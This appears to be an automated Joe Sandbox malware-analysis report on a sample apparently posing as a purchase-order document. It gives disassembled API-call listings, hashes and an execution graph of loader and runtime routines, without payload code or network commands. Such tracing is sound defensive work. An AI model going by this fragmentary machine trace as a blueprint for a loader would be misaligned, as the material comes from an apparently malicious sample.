                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Free$GlobalLibrary
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 1100898210-823278215
                                                                                • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                                • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrlen
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 2709904686-1246513382
                                                                                • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                                • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D2B
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

                                                                                Execution Graph

                                                                                Execution Coverage:2.6%
                                                                                Dynamic/Decrypted Code Coverage:96.7%
                                                                                Signature Coverage:1.6%
                                                                                Total number of Nodes:1641
                                                                                Total number of Limit Nodes:5
                                                                                execution_graph 6156 341d281c 6159 341d2882 6156->6159 6162 341d3550 6159->6162 6161 341d282a 6163 341d355d 6162->6163 6167 341d358a 6162->6167 6164 341d47e5 ___std_exception_copy 21 API calls 6163->6164 6163->6167 6165 341d357a 6164->6165 6165->6167 6168 341d544d 6165->6168 6167->6161 6169 341d5468 6168->6169 6170 341d545a 6168->6170 6171 341d6368 __dosmaperr 20 API calls 6169->6171 6170->6169 6173 341d547f 6170->6173 6176 341d5470 6171->6176 6174 341d547a 6173->6174 6175 341d6368 __dosmaperr 20 API calls 6173->6175 6174->6167 6175->6176 6177 341d62ac 6176->6177 6180 341d6231 6177->6180 6179 341d62b8 6179->6174 6181 341d5b7a _abort 20 API calls 6180->6181 6182 341d6247 6181->6182 6183 341d6255 6182->6183 6184 341d62a6 6182->6184 6188 341d2ada _ValidateLocalCookies 5 API calls 6183->6188 6191 341d62bc IsProcessorFeaturePresent 6184->6191 6186 341d62ab 6187 341d6231 ___std_exception_copy 26 API calls 6186->6187 6189 341d62b8 6187->6189 6190 341d627c 6188->6190 6189->6179 6190->6179 6192 341d62c7 6191->6192 6195 341d60e2 6192->6195 6196 341d60fe ___scrt_fastfail 6195->6196 6197 341d612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6196->6197 6198 341d61fb ___scrt_fastfail 6197->6198 6199 341d2ada _ValidateLocalCookies 5 API calls 6198->6199 6200 341d6219 GetCurrentProcess TerminateProcess 6199->6200 6200->6186 6201 341d2418 6202 341d2420 ___scrt_release_startup_lock 6201->6202 6205 341d47f5 6202->6205 6204 341d2448 6206 341d4808 6205->6206 6207 341d4804 6205->6207 6210 341d4815 6206->6210 6207->6204 6211 341d5b7a _abort 20 API calls 6210->6211 6214 341d482c 6211->6214 6212 341d2ada _ValidateLocalCookies 5 API calls 6213 341d4811 6212->6213 6213->6204 6214->6212 7275 341d4a9a 7278 341d5411 7275->7278 7279 341d541d _abort 7278->7279 7280 341d5af6 _abort 38 API calls 7279->7280 7281 341d5422 7280->7281 7282 341d55a8 _abort 38 API calls 7281->7282 7283 341d544c 7282->7283 7284 341d3c90 RtlUnwind 6215 341d220c 6216 341d221a dllmain_dispatch 6215->6216 6217 341d2215 6215->6217 6219 341d22b1 6217->6219 6220 341d22c7 6219->6220 6222 341d22d0 6220->6222 6223 341d2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6220->6223 6222->6216 6223->6222 7285 341d8a89 7288 341d6d60 7285->7288 7289 341d6d69 7288->7289 7290 341d6d72 7288->7290 7292 341d6c5f 7289->7292 7293 341d5af6 _abort 38 API calls 7292->7293 7294 341d6c6c 7293->7294 7295 341d6d7e __fassign 38 API calls 7294->7295 7296 341d6c74 7295->7296 7312 341d69f3 7296->7312 7299 341d6c8b 7299->7290 7304 341d571e _free 20 API calls 7304->7299 7305 341d6cc9 7307 341d6368 __dosmaperr 20 API calls 7305->7307 7306 341d6ce6 7308 341d6d12 7306->7308 7309 341d571e _free 20 API calls 7306->7309 7311 341d6cce 7307->7311 7308->7311 7336 341d68c9 7308->7336 7309->7308 7311->7304 7313 341d54a7 __fassign 38 API calls 7312->7313 7314 341d6a05 7313->7314 7315 341d6a14 GetOEMCP 7314->7315 7316 341d6a26 7314->7316 7318 341d6a3d 7315->7318 7317 341d6a2b GetACP 7316->7317 7316->7318 7317->7318 7318->7299 7319 341d56d0 7318->7319 7320 341d570e 7319->7320 7325 341d56de _abort 7319->7325 7321 341d6368 __dosmaperr 20 API calls 7320->7321 7323 341d570c 7321->7323 7322 341d56f9 RtlAllocateHeap 7322->7323 7322->7325 7323->7311 7326 341d6e20 7323->7326 7324 341d474f _abort 7 API calls 7324->7325 7325->7320 7325->7322 7325->7324 7327 341d69f3 40 API calls 7326->7327 7328 341d6e3f 7327->7328 7331 341d6e90 IsValidCodePage 7328->7331 7333 341d6e46 7328->7333 7335 341d6eb5 ___scrt_fastfail 7328->7335 7329 341d2ada _ValidateLocalCookies 5 API calls 7330 341d6cc1 7329->7330 7330->7305 7330->7306 7332 341d6ea2 GetCPInfo 7331->7332 7331->7333 7332->7333 7332->7335 7333->7329 7339 341d6acb GetCPInfo 7335->7339 7412 341d6886 7336->7412 7338 341d68ed 7338->7311 7340 341d6baf 7339->7340 7345 341d6b05 7339->7345 7342 341d2ada _ValidateLocalCookies 5 API calls 7340->7342 7344 341d6c5b 7342->7344 7344->7333 7349 341d86e4 7345->7349 7348 341d8a3e 43 API calls 7348->7340 7350 341d54a7 __fassign 38 API calls 7349->7350 7351 341d8704 MultiByteToWideChar 7350->7351 7353 341d8742 7351->7353 7361 341d87da 7351->7361 7355 341d8763 ___scrt_fastfail 7353->7355 7356 341d56d0 21 API calls 7353->7356 7354 341d2ada _ValidateLocalCookies 5 API calls 7357 341d6b66 7354->7357 7358 341d87d4 7355->7358 7360 341d87a8 MultiByteToWideChar 7355->7360 7356->7355 7363 341d8a3e 7357->7363 7368 341d8801 7358->7368 7360->7358 7362 341d87c4 GetStringTypeW 7360->7362 7361->7354 7362->7358 7364 341d54a7 __fassign 38 API calls 7363->7364 7365 341d8a51 7364->7365 7372 341d8821 7365->7372 7369 341d880d 7368->7369 7370 341d881e 7368->7370 7369->7370 7371 341d571e _free 20 API calls 7369->7371 7370->7361 7371->7370 7373 341d883c 7372->7373 7374 341d8862 MultiByteToWideChar 7373->7374 7375 341d888c 7374->7375 7376 341d8a16 7374->7376 7379 341d56d0 21 API calls 7375->7379 7381 341d88ad 7375->7381 7377 341d2ada _ValidateLocalCookies 5 API calls 7376->7377 7378 341d6b87 7377->7378 7378->7348 7379->7381 7380 341d88f6 MultiByteToWideChar 7382 341d890f 7380->7382 7394 341d8962 7380->7394 7381->7380 7381->7394 7399 341d5f19 7382->7399 7384 341d8801 __freea 20 API calls 7384->7376 7386 341d8939 7388 341d5f19 11 API calls 7386->7388 7386->7394 7387 341d8971 7390 341d56d0 21 API calls 7387->7390 7393 341d8992 7387->7393 7388->7394 7389 341d8a07 7392 341d8801 __freea 20 API calls 7389->7392 7390->7393 7391 341d5f19 11 API calls 7395 341d89e6 7391->7395 7392->7394 7393->7389 7393->7391 7394->7384 7395->7389 7396 341d89f5 WideCharToMultiByte 7395->7396 7396->7389 7397 341d8a35 7396->7397 7398 341d8801 __freea 20 API calls 7397->7398 7398->7394 7400 341d5c45 _abort 5 API calls 7399->7400 7401 341d5f40 7400->7401 7404 341d5f49 7401->7404 7407 341d5fa1 7401->7407 7405 341d2ada _ValidateLocalCookies 5 API calls 7404->7405 7406 341d5f9b 7405->7406 7406->7386 7406->7387 7406->7394 7408 341d5c45 _abort 5 API calls 7407->7408 7409 341d5fc8 7408->7409 7410 341d2ada _ValidateLocalCookies 5 API calls 7409->7410 7411 341d5f89 LCMapStringW 7410->7411 7411->7404 7413 341d6892 ___scrt_is_nonwritable_in_current_image 7412->7413 7420 341d5671 RtlEnterCriticalSection 7413->7420 7415 341d689c 7421 341d68f1 7415->7421 7419 341d68b5 _abort 7419->7338 7420->7415 7433 341d7011 7421->7433 7423 341d693f 7424 341d7011 26 API calls 7423->7424 7425 341d695b 7424->7425 7426 341d7011 26 API calls 7425->7426 7427 341d6979 7426->7427 7428 341d68a9 7427->7428 7429 341d571e _free 20 API calls 7427->7429 7430 341d68bd 7428->7430 7429->7428 7447 341d56b9 RtlLeaveCriticalSection 7430->7447 7432 341d68c7 7432->7419 7434 341d7022 7433->7434 7438 341d701e 7433->7438 7435 341d7029 7434->7435 7440 341d703c ___scrt_fastfail 7434->7440 7436 341d6368 __dosmaperr 20 API calls 7435->7436 7437 341d702e 7436->7437 7439 341d62ac ___std_exception_copy 26 API calls 7437->7439 7438->7423 7439->7438 7440->7438 7441 341d706a 7440->7441 7442 341d7073 7440->7442 7443 341d6368 __dosmaperr 20 API calls 7441->7443 7442->7438 7445 341d6368 __dosmaperr 20 API calls 7442->7445 7444 341d706f 7443->7444 7446 341d62ac ___std_exception_copy 26 API calls 7444->7446 7445->7444 7446->7438 7447->7432 7452 341d7a80 7453 341d7a8d 7452->7453 7454 341d637b _abort 20 API calls 7453->7454 7455 341d7aa7 7454->7455 7456 341d571e _free 20 API calls 7455->7456 7457 341d7ab3 7456->7457 7458 341d637b _abort 20 API calls 7457->7458 7462 341d7ad9 7457->7462 7459 341d7acd 7458->7459 7461 341d571e _free 20 API calls 7459->7461 7460 341d5eb7 11 API calls 7460->7462 7461->7462 7462->7460 7463 341d7ae5 7462->7463 6224 341d7103 GetCommandLineA GetCommandLineW 6225 341d5303 6228 341d50a5 6225->6228 6237 341d502f 6228->6237 6231 341d502f 5 API calls 6232 341d50c3 6231->6232 6241 341d5000 6232->6241 6235 341d5000 20 API calls 6236 341d50d9 6235->6236 6238 341d5048 6237->6238 6239 341d2ada _ValidateLocalCookies 5 API calls 6238->6239 6240 341d5069 6239->6240 6240->6231 6242 341d500d 6241->6242 6243 341d502a 6241->6243 6244 341d5024 6242->6244 6245 341d571e _free 20 API calls 6242->6245 6243->6235 6246 341d571e _free 20 API calls 6244->6246 6245->6242 6246->6243 6247 341d543d 6248 341d5440 6247->6248 6251 341d55a8 6248->6251 6262 341d7613 6251->6262 6254 341d55b8 6255 341d55c2 IsProcessorFeaturePresent 6254->6255 6261 341d55e0 6254->6261 6257 341d55cd 6255->6257 6259 341d60e2 _abort 8 API calls 6257->6259 6259->6261 6292 341d4bc1 6261->6292 6295 341d7581 6262->6295 6265 341d766e 6266 341d767a _abort 6265->6266 6267 341d5b7a _abort 20 API calls 6266->6267 6271 341d76a7 _abort 6266->6271 6272 341d76a1 _abort 6266->6272 6267->6272 6268 341d76f3 6269 341d6368 __dosmaperr 20 API calls 6268->6269 6270 341d76f8 6269->6270 6273 341d62ac ___std_exception_copy 26 API calls 6270->6273 6277 341d771f 6271->6277 6309 341d5671 RtlEnterCriticalSection 6271->6309 6272->6268 6272->6271 6291 341d76d6 6272->6291 6273->6291 6278 341d777e 6277->6278 6280 341d7776 6277->6280 6288 341d77a9 6277->6288 6310 341d56b9 RtlLeaveCriticalSection 6277->6310 6278->6288 6311 341d7665 6278->6311 6283 341d4bc1 _abort 28 API calls 6280->6283 6283->6278 6287 341d7665 _abort 38 API calls 6287->6288 6314 341d782e 6288->6314 6289 341d780c 6290 341d5af6 _abort 38 API calls 6289->6290 6289->6291 6290->6291 6338 341dbdc9 6291->6338 6342 341d499b 6292->6342 6298 341d7527 6295->6298 6297 341d55ad 6297->6254 6297->6265 6299 341d7533 ___scrt_is_nonwritable_in_current_image 6298->6299 6304 341d5671 RtlEnterCriticalSection 6299->6304 6301 341d7541 6305 341d7575 6301->6305 6303 341d7568 _abort 6303->6297 6304->6301 6308 341d56b9 RtlLeaveCriticalSection 6305->6308 6307 341d757f 6307->6303 6308->6307 6309->6277 6310->6280 6312 341d5af6 _abort 38 API calls 6311->6312 6313 341d766a 6312->6313 6313->6287 6315 341d77fd 6314->6315 6316 341d7834 6314->6316 6315->6289 6315->6291 6318 341d5af6 GetLastError 6315->6318 6341 341d56b9 RtlLeaveCriticalSection 6316->6341 6319 341d5b0c 6318->6319 6322 341d5b12 6318->6322 6320 341d5e08 _abort 11 API calls 6319->6320 6320->6322 6321 341d637b _abort 20 API calls 6323 341d5b24 6321->6323 6322->6321 6324 341d5b61 SetLastError 6322->6324 6325 341d5b2c 6323->6325 6326 341d5e5e _abort 11 API calls 6323->6326 6324->6289 6327 341d571e _free 20 API calls 6325->6327 6328 341d5b41 6326->6328 6329 341d5b32 6327->6329 6328->6325 6330 341d5b48 6328->6330 6332 341d5b6d SetLastError 6329->6332 6331 341d593c _abort 20 API calls 6330->6331 6333 341d5b53 6331->6333 6334 341d55a8 _abort 35 API calls 6332->6334 6335 341d571e _free 20 API calls 6333->6335 6336 341d5b79 6334->6336 6337 341d5b5a 6335->6337 6337->6324 6337->6332 6339 341d2ada _ValidateLocalCookies 5 API calls 6338->6339 6340 341dbdd4 6339->6340 6340->6340 6341->6315 6343 341d49a7 _abort 6342->6343 6344 341d49bf 6343->6344 6364 341d4af5 GetModuleHandleW 6343->6364 6373 341d5671 RtlEnterCriticalSection 6344->6373 6348 341d4a65 6381 341d4aa5 6348->6381 6351 341d4a3c 6355 341d4a54 6351->6355 6377 341d4669 6351->6377 6353 341d4aae 6358 341dbdc9 _abort 5 API calls 6353->6358 6354 341d4a82 6384 341d4ab4 6354->6384 6360 341d4669 _abort 5 API calls 6355->6360 6363 341d4ab3 6358->6363 6360->6348 6361 341d49c7 6361->6348 6361->6351 6374 341d527a 6361->6374 6365 341d49b3 6364->6365 6365->6344 6366 341d4b39 GetModuleHandleExW 6365->6366 6367 341d4b63 GetProcAddress 6366->6367 6368 341d4b78 6366->6368 6367->6368 6369 341d4b8c FreeLibrary 6368->6369 6370 341d4b95 6368->6370 6369->6370 6371 341d2ada _ValidateLocalCookies 5 API calls 6370->6371 6372 341d4b9f 6371->6372 6372->6344 6373->6361 6392 341d5132 6374->6392 6378 341d4698 6377->6378 6379 341d2ada _ValidateLocalCookies 5 API calls 6378->6379 6380 341d46c1 6379->6380 6380->6355 6414 341d56b9 RtlLeaveCriticalSection 6381->6414 6383 341d4a7e 6383->6353 6383->6354 6415 341d6025 6384->6415 6387 341d4ae2 6390 341d4b39 _abort 8 API calls 6387->6390 6388 341d4ac2 GetPEB 6388->6387 6389 341d4ad2 GetCurrentProcess TerminateProcess 6388->6389 6389->6387 6391 341d4aea ExitProcess 6390->6391 6395 341d50e1 6392->6395 6394 341d5156 6394->6351 6396 341d50ed ___scrt_is_nonwritable_in_current_image 6395->6396 6403 341d5671 RtlEnterCriticalSection 6396->6403 6398 341d50fb 6404 341d515a 6398->6404 6402 341d5119 _abort 6402->6394 6403->6398 6405 341d517a 6404->6405 6408 341d5182 6404->6408 6406 341d2ada _ValidateLocalCookies 5 API calls 6405->6406 6407 341d5108 6406->6407 6410 341d5126 6407->6410 6408->6405 6409 341d571e _free 20 API calls 6408->6409 6409->6405 6413 341d56b9 RtlLeaveCriticalSection 6410->6413 6412 341d5130 6412->6402 6413->6412 6414->6383 6416 341d604a 6415->6416 6420 341d6040 6415->6420 6417 341d5c45 _abort 5 API calls 6416->6417 6417->6420 6418 341d2ada _ValidateLocalCookies 5 API calls 6419 341d4abe 6418->6419 6419->6387 6419->6388 6420->6418 6421 341d1f3f 6422 341d1f4b ___scrt_is_nonwritable_in_current_image 6421->6422 6439 341d247c 6422->6439 6424 341d1f57 ___scrt_is_nonwritable_in_current_image 6425 341d1f52 6425->6424 6426 341d1f7c 6425->6426 6427 341d2041 6425->6427 6450 341d23de 6426->6450 6462 341d2639 IsProcessorFeaturePresent 6427->6462 6430 341d2048 6431 341d1f8b __RTC_Initialize 6431->6424 6453 341d22fc RtlInitializeSListHead 6431->6453 6433 341d1f99 ___scrt_initialize_default_local_stdio_options 6454 341d46c5 6433->6454 6437 341d1fb8 6437->6424 6438 341d4669 _abort 5 API calls 6437->6438 6438->6424 6440 341d2485 6439->6440 6466 341d2933 IsProcessorFeaturePresent 6440->6466 6444 341d2496 6445 341d249a 6444->6445 6477 341d53c8 6444->6477 6445->6425 6448 341d24b1 6448->6425 6551 341d24b5 6450->6551 6452 341d23e5 6452->6431 6453->6433 6457 341d46dc 6454->6457 6455 341d2ada _ValidateLocalCookies 5 API calls 6456 341d1fad 6455->6456 6456->6424 6458 341d23b3 6456->6458 6457->6455 6459 341d23b8 ___scrt_release_startup_lock 6458->6459 6460 341d2933 ___isa_available_init IsProcessorFeaturePresent 6459->6460 6461 341d23c1 6459->6461 6460->6461 6461->6437 6463 341d264e ___scrt_fastfail 6462->6463 6464 341d26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6463->6464 6465 341d2744 ___scrt_fastfail 6464->6465 6465->6430 6467 341d2491 6466->6467 6468 341d34ea 6467->6468 6469 341d34ef ___vcrt_initialize_winapi_thunks 6468->6469 6488 341d3936 6469->6488 6473 341d3505 6474 341d3510 6473->6474 6502 341d3972 6473->6502 6474->6444 6476 341d34fd 6476->6444 6543 341d7457 6477->6543 6480 341d3529 6481 341d3543 6480->6481 6482 341d3532 6480->6482 6481->6445 6483 341d391b ___vcrt_uninitialize_ptd 6 API calls 6482->6483 6484 341d3537 6483->6484 6485 341d3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6484->6485 6486 341d353c 6485->6486 6547 341d3c50 6486->6547 6491 341d393f 6488->6491 6490 341d3968 6492 341d3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6490->6492 6491->6490 6493 341d34f9 6491->6493 6506 341d3be0 6491->6506 6492->6493 6493->6476 6494 341d38e8 6493->6494 6524 341d3af1 6494->6524 6497 341d38fd 6497->6473 6500 341d3918 6500->6473 6503 341d399c 6502->6503 6504 341d397d 6502->6504 6503->6476 6505 341d3987 RtlDeleteCriticalSection 6504->6505 6505->6503 6505->6505 6511 341d3a82 6506->6511 6508 341d3bfa 6509 341d3c18 InitializeCriticalSectionAndSpinCount 6508->6509 6510 341d3c03 6508->6510 6509->6510 6510->6491 6512 341d3aaa 6511->6512 6516 341d3aa6 __crt_fast_encode_pointer 6511->6516 6512->6516 6517 341d39be 6512->6517 6515 341d3ac4 GetProcAddress 6515->6516 6516->6508 6521 341d39cd try_get_first_available_module 6517->6521 6518 341d39ea LoadLibraryExW 6519 341d3a05 GetLastError 6518->6519 6518->6521 6519->6521 6520 341d3a60 FreeLibrary 6520->6521 6521->6518 6521->6520 6522 341d3a77 6521->6522 6523 341d3a38 LoadLibraryExW 6521->6523 6522->6515 6522->6516 6523->6521 6525 341d3a82 try_get_function 5 API calls 6524->6525 6526 341d3b0b 6525->6526 6527 341d3b24 TlsAlloc 6526->6527 6528 341d38f2 6526->6528 6528->6497 6529 341d3ba2 6528->6529 6530 341d3a82 try_get_function 5 API calls 6529->6530 6531 341d3bbc 6530->6531 6532 341d3bd7 TlsSetValue 6531->6532 6533 341d390b 6531->6533 6532->6533 6533->6500 6534 341d391b 6533->6534 6535 341d3925 6534->6535 6536 341d392b 6534->6536 6538 341d3b2c 6535->6538 6536->6497 6539 341d3a82 try_get_function 5 API calls 6538->6539 6540 341d3b46 6539->6540 6541 341d3b5e TlsFree 6540->6541 6542 341d3b52 6540->6542 6541->6542 6542->6536 6544 341d7470 6543->6544 6545 341d2ada _ValidateLocalCookies 5 API calls 6544->6545 6546 341d24a3 6545->6546 6546->6448 6546->6480 6548 341d3c59 6547->6548 6550 341d3c7f 6547->6550 6549 341d3c69 FreeLibrary 6548->6549 6548->6550 6549->6548 6550->6481 6552 341d24c8 6551->6552 6553 341d24c4 6551->6553 6554 341d2639 ___scrt_fastfail 4 API calls 6552->6554 6556 341d24d5 ___scrt_release_startup_lock 6552->6556 6553->6452 6555 341d2559 6554->6555 6556->6452 7464 341d67bf 7469 341d67f4 7464->7469 7467 341d67db 7468 341d571e _free 20 API calls 7468->7467 7470 341d6806 7469->7470 7479 341d67cd 7469->7479 7471 341d680b 7470->7471 7472 341d6836 7470->7472 7473 341d637b _abort 20 API calls 7471->7473 7472->7479 7480 341d71d6 7472->7480 7475 341d6814 7473->7475 7477 341d571e _free 20 API calls 7475->7477 7476 341d6851 7478 341d571e _free 20 API calls 7476->7478 7477->7479 7478->7479 7479->7467 7479->7468 7481 341d71e1 7480->7481 7482 341d7209 7481->7482 7483 341d71fa 7481->7483 7484 341d7218 7482->7484 7489 341d8a98 7482->7489 7485 341d6368 __dosmaperr 20 API calls 7483->7485 7496 341d8acb 7484->7496 7488 341d71ff ___scrt_fastfail 7485->7488 7488->7476 7490 341d8ab8 RtlSizeHeap 7489->7490 7491 341d8aa3 7489->7491 7490->7484 7492 341d6368 __dosmaperr 20 API calls 7491->7492 7493 341d8aa8 7492->7493 7494 341d62ac ___std_exception_copy 26 API calls 7493->7494 7495 341d8ab3 7494->7495 7495->7484 7497 341d8ad8 7496->7497 7498 341d8ae3 7496->7498 7499 341d56d0 21 API calls 7497->7499 7500 341d8aeb 7498->7500 7506 341d8af4 _abort 7498->7506 7504 341d8ae0 7499->7504 7501 341d571e _free 20 API calls 7500->7501 7501->7504 7502 341d8b1e RtlReAllocateHeap 7502->7504 7502->7506 7503 341d8af9 7505 341d6368 __dosmaperr 20 API calls 7503->7505 7504->7488 7505->7504 7506->7502 7506->7503 7507 341d474f _abort 7 API calls 7506->7507 7507->7506 6557 40336c SetErrorMode GetVersion 6558 4033bc 6557->6558 6580 406601 GetSystemDirectoryW 6558->6580 6560 4033c7 lstrlenA 6560->6558 6561 4033d7 6560->6561 6583 406671 GetModuleHandleA 6561->6583 6564 406671 5 API calls 6565 4033e5 6564->6565 6566 406671 5 API calls 6565->6566 6567 4033f1 #17 OleInitialize SHGetFileInfoW 6566->6567 6589 406297 lstrcpynW 6567->6589 6570 40343d GetCommandLineW 6590 406297 lstrcpynW 6570->6590 6572 40344f 6591 405b99 6572->6591 6575 40359e GetTempPathW 6595 40333b 6575->6595 6577 4035b6 DeleteFileW 6579 402edd 6577->6579 6581 406623 wsprintfW LoadLibraryExW 6580->6581 6581->6560 6584 406697 GetProcAddress 6583->6584 6585 40668d 6583->6585 6587 4033de 6584->6587 6586 406601 3 API calls 6585->6586 6588 406693 6586->6588 6587->6564 6588->6584 6588->6587 6589->6570 6590->6572 6592 405b9f 6591->6592 6593 403474 CharNextW 6592->6593 6594 405ba6 CharNextW 6592->6594 6593->6575 6594->6592 6605 40652b 6595->6605 6597 403351 6597->6577 6598 403347 6598->6597 6614 405b6c lstrlenW CharPrevW 6598->6614 6607 406538 6605->6607 6606 4065ae 6608 4065b3 CharPrevW 6606->6608 6611 4065d4 6606->6611 6607->6606 6609 4065a1 CharNextW 6607->6609 6610 405b99 CharNextW 6607->6610 6612 40658d CharNextW 6607->6612 6613 40659c CharNextW 6607->6613 6608->6606 6609->6606 6609->6607 6610->6607 6611->6598 6612->6607 6613->6609 6615 403359 6614->6615 6616 405b88 lstrcatW 6614->6616 6617 40584b CreateDirectoryW 